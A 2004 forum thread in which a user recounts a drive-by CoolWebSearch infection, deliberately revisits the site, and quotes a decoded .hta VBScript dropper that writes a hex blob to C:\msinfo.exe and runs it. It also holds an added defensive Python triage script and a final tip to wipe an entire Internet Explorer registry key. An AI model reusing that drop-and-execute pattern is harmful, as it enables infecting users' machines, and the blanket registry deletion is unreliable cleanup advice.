Synapse
Posted October 2, 2004

Went to a website earlier looking for a sound file, "Quagmire from Family Guy saying giddy giddy giddy" or whatever.. anyways.. came across one website and when I clicked it had some lesbian porn site... then my AVG Antivirus came up and said 2 viruses were found.

1. C:\Windows\MSOPT.DLL (Downloader.Small.6.BA)
2. C:\Windows\System32\IEYY32.DLL (Downloader.agent.2.BN)

I got Spyware Blaster and Spyware Guard installed. It came up about 5 times saying something was trying to change my search page, my homepage, and a bunch of others. I removed the 2 files, and when I looked in my C:\ I saw a file named "msinfo.exe". Checked my Process Explorer (Sysinternals freeware), not the ctrl+alt+delete task manager.. and msinfo.exe was running with an open port... so I forcefully shut that down. Everything else looked fine. So I looked up msinfo.exe and it came back as part of CoolWebSearch...

msinfo.exe Process Information

Well... deleted msinfo.exe and ran HijackThis. It came back with some sites in the trusted sites list. Deleted them and checked the list manually. There was 1 that was just an IP address, so deleted that one too. But now every website I come to has the "Trusted Sites" thing down in the lower right corner... even sites I've never visited before have that...

Synapse (Author)
Posted October 2, 2004

Hmm... none of my cookies, temporary files or history is being deleted when I right click Internet Explorer and hit delete...

Also.. I found the website that caused this... I'm probably gonna install another copy of Windows using VMware and visit... see what makes it "tick" lol

Synapse (Author)
Posted October 2, 2004

Well... decided to go for the gold lol. Went back to the site, got infected about 6 more times, viewed the source of most of the pages.. it redirects A LOT! And they tried covering the data with a weak JavaScript encryption. Then found a file in my temporary internet files.. called *randomname*.hta... this file too is encrypted, but I decrypted it a bit...

*some HTML crap*

    c0 = "*LOTS of random letters and numbers, guessing this is the "virus/downloader" itself*"
    h0 = ""
    i = 1
    Do While i < Len(c0)
        h0 = h0 & chr(cint("&h" & mid(c0, i, 2)))
        i = i + 2
    Loop
    set wsh = CreateObject("WScript.Shell")
    path = "C:\\"
    set fs = CreateObject("Scripting.FileSystemObject")
    set ts = fs.CreateTextFile(path + "msinfo.exe", true, false)
    ts.Write(h0)
    ts.Close()
    wsh.Run(path + "msinfo.exe")
    self.close()
    </script>

*End HTML crap..*

So.. I guess I'm gonna look for how to stop .hta extensions from being executed...
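
Added example, not part of the original posts: a static triage of an .hta file like the one quoted above, which flags the script behaviours the post shows (shell object, file write, process launch, hex-decode loop) and decodes the hex blob the same way the loop does, without writing or running anything. The function name `triage_hta` and the sample input are assumptions made for illustration; the sample blob is a constructed 16-byte stand-in, not the real payload.

```python
import hashlib
import re

# Script behaviours worth flagging in an .hta pulled from a browser cache.
INDICATORS = {
    "shell_object": re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I),
    "file_write": re.compile(r'\.CreateTextFile\(', re.I),
    "process_launch": re.compile(r'\.Run\s*\(', re.I),
    "hex_decode_loop": re.compile(r'chr\(\s*cint\(\s*"&h"', re.I),
}
# Long string literal made only of hex digits, assigned to a variable.
HEX_ASSIGN = re.compile(r'(\w+)\s*=\s*"([0-9A-Fa-f]{16,})"')
# File name passed to CreateTextFile, e.g. path + "msinfo.exe".
DROP_NAME = re.compile(r'CreateTextFile\([^)]*?"([^"]+\.exe)"', re.I)

def triage_hta(text):
    """Statically inspect HTA script text; nothing is written or executed."""
    report = {"indicators": sorted(k for k, rx in INDICATORS.items() if rx.search(text)),
              "drop_names": DROP_NAME.findall(text), "payloads": []}
    for var, blob in HEX_ASSIGN.findall(text):
        # Same transform as the script's loop: each 2 hex chars -> 1 byte.
        data = bytes.fromhex(blob[: len(blob) - len(blob) % 2])
        report["payloads"].append({
            "variable": var,
            "size": len(data),
            "is_pe": data[:2] == b"MZ",   # DOS/PE executable magic
            "sha256": hashlib.sha256(data).hexdigest(),
        })
    return report

# Constructed sample: same structure as the script in the post, but the blob
# is a harmless 16-byte stand-in ("MZ" + padding), not a real payload.
SAMPLE_HTA = '''<html><script language="VBScript">
c0 = "4D5A90000300000004000000FFFF0000"
h0 = ""
i = 1
Do While i < Len(c0)
h0 = h0 & chr(cint("&h" & mid(c0, i, 2)))
i = i + 2
Loop
set wsh = CreateObject("WScript.Shell")
set fs = CreateObject("Scripting.FileSystemObject")
set ts = fs.CreateTextFile(path + "msinfo.exe", true, false)
ts.Write(h0)
wsh.Run(path + "msinfo.exe")
</script></html>'''

if __name__ == "__main__":
    print(triage_hta(SAMPLE_HTA))
```

The SHA-256 of the decoded bytes can be compared against whatever the antivirus quarantined, and the `is_pe` flag confirms whether the blob is an executable before anything touches disk.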

Synapse (Author)
Posted October 3, 2004

OK, never mind.. I fixed it. After removing the virus/trojan and deleting the files, I went into my registry and deleted everything under:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

and now it's all better